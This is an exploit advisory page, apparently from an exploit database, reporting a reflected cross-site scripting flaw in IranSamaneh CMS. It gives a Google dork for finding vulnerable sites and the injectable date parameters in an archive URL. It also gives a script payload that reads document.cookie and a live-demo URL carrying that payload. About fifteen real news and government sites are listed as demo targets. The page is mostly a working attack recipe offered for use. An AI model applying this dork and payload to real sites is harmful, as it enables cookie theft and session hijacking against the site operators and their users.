IranSamaneh CMS Cross Site Scripting

2017.04.05
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

########################## # Exploit Title: IranSamaneh CMS Cross Site Scripting # Google Dork: intext:"طراحی و تولید: " ایران سامانه " " intitle:آرشیو # Date: 2017-04-05 # Exploit Author: Sh4dow # My Team:Zero Security Group # Vendor Homepage: https://iransamaneh.com/ # Software Link: - # Version: all # Tested on: Kali Linux # CVE : - ########################## Description: IranSamaneh System design and development of web-based systems designed to host corporate portal News Agency ----------------- Proof Step To Step Do It: 1- Use Dork In Google And Choose a Site: 2- Change URL(fa/archive?service_id=-1&sec_id=-1&cat_id=-1&rpp=20&from_date=1392/07/06&to_date=1396/01/16&p=2) 3- Now Use XSS Script in (from_data= or to_data=) # ExampleDemo Bypass Script: ( `'"><b><script>alert(document.cookie)</script></b> ) # Demo: http://tabnak.ir/ http://yjc.ir/ http://www.irinn.ir/ http://iribnews.ir// http://kayhan.ir// http://csr.ir http://www.mashreghnews.ir/ http://www.fardanews.com/ http://navideshahed.com/ http://aghigh.ir/ http://www.seratnews.ir/ http://pedalnews.ir/ http://iana.ir/ http://apic.co/ http://javanonline.ir/ # You can Finde Many Site by using Google Dork ---------------------------------------- Live Demo: http://www.tabnak.ir/fa/archive?service_id=-1&sec_id=-1&cat_id=-1&rpp=20&from_date=1392/07/06&to_date=`%27%22%3E%3Cb%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E%3C/b%3E&p=2 ---------------------------------------- # # Msg:Brother SOLTAN SILENT Returned # #--------------------------------------- # Greetz :Ghostman And My Pc # We Are:Sh4dow - Ghostman - SOLTAN SILENT - And All Member # Iranian Underground Researchers # https://telegram.me/ZeroSecOfficial


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2017, cxsecurity.com

 

Back to Top